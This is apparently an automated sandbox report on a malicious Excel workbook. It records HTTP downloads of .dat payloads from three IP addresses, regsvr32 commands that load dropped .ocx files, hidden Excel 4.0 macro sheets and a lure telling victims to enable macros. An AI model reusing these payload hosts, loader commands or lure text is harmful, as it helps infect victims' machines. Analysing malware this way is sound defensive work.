    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.coma
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msom
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 12Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
    Source: Screenshot number: 12Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 12Screenshot OCR: Enable Macros ) Why I can not open this document? Sheet Ready O Type here to search i "I Ki
    Source: Screenshot number: 16Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
    Source: Screenshot number: 16Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 16Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: ClaimCopy-1848214335-12022021.xlsbInitial sample: EXEC
    Found protected and hidden Excel 4.0 Macro sheetShow sources
    Source: ClaimCopy-1848214335-12022021.xlsbInitial sample: Sheet name: Tiposa1
    Source: ClaimCopy-1848214335-12022021.xlsbMacro extractor: Sheet name: Tiposa1
    Source: ClaimCopy-1848214335-12022021.xlsbMacro extractor: Sheet name: Tiposa
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380D0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380D0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F3B140
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F3B140
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380AC
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380AC
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380D0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380D0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F3B140
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F3B140
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380AC
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_12F380AC
    Source: ClaimCopy-1848214335-12022021.xlsbVirustotal: Detection: 8%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{9BF09C99-1BEE-4B64-994B-EDA637E32634} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal76.expl.evad.winXLSB@13/6@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ClaimCopy-1848214335-12022021.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: ClaimCopy-1848214335-12022021.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: D1330000.0.drInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: D1330000.0.drInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: EXCEL.EXE, 00000000.00000002.607513208.000000000F3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607425649.000000000F330000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000000.00000002.605060026.000000000D4E1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ClaimCopy-1848214335-12022021.xlsb9%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://158.69.133.78/337591964609.datQ0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://api.aadrm.com70%Avira URL Cloudsafe
    http://schemas.open0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.office.netvI5=0%Avira URL Cloudsafe
    http://158.69.133.78/337591964609.dat20%Avira URL Cloudsafe
    http://ww.org0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://settings.outlook.coml0%Avira URL Cloudsafe
    http://158.69.133.78/337591964609.dat240%Avira URL Cloudsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    http://158.69.133.78/337591964609.dat0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    http://185.82.126.78/337591964609.dat20%Avira URL Cloudsafe
    https://substrate.office.coms0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.comQ%g;D0%Avira URL Cloudsafe
    https://graph.windows.netp0%Avira URL Cloudsafe
    https://substrate.office.comP0%Avira URL Cloudsafe
    https://api.diagnostics.office.comom0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://nexus.officeap0%Avira URL Cloudsafe
    https://powerlift.acompli.netm0%Avira URL Cloudsafe
    https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionslL0%Avira URL Cloudsafe
    https://www.odwebp.svc.msom0%Avira URL Cloudsafe
    http://185.82.126.78/337591964609.dat0%Avira URL Cloudsafe
    https://devnull.onenote.comed0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://158.69.133.78/337591964609.dat2false
    • Avira URL Cloud: safe
    		unknown
    http://158.69.133.78/337591964609.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://185.82.126.78/337591964609.dat2false
    • Avira URL Cloud: safe
    		unknown
    http://185.82.126.78/337591964609.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5;EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
      		high
      http://158.69.133.78/337591964609.datQEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
        		high
        https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
          		high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
            		high
            https://cdn.entity.3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
            • URL Reputation: safe
            		unknown
            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
              		high
              https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
              • URL Reputation: safe
              		unknown
              https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                		high
                https://api.aadrm.com7EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.openEXCEL.EXE, 00000000.00000003.455330974.00000000156F1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454666874.0000000015786000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454809646.00000000155F0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                  		high
                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                    		high
                    https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.office.netvI5=EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://ww.orgEXCEL.EXE, 00000000.00000003.456916079.0000000012F1B000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                      		high
                      https://api.microsoftstream.com/api/3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                          		high
                          https://cr.office.com3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                            		high
                            https://clients.config.office.net/user/v1.0/android/policies%EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                              		high
                              https://login.windows.net/common/oauth2/authorizet-EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                		high
                                https://res.getmicrosoftkey.com/api/redemptionevents3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://settings.outlook.comlEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://158.69.133.78/337591964609.dat24EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://tasks.office.com3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                  		high
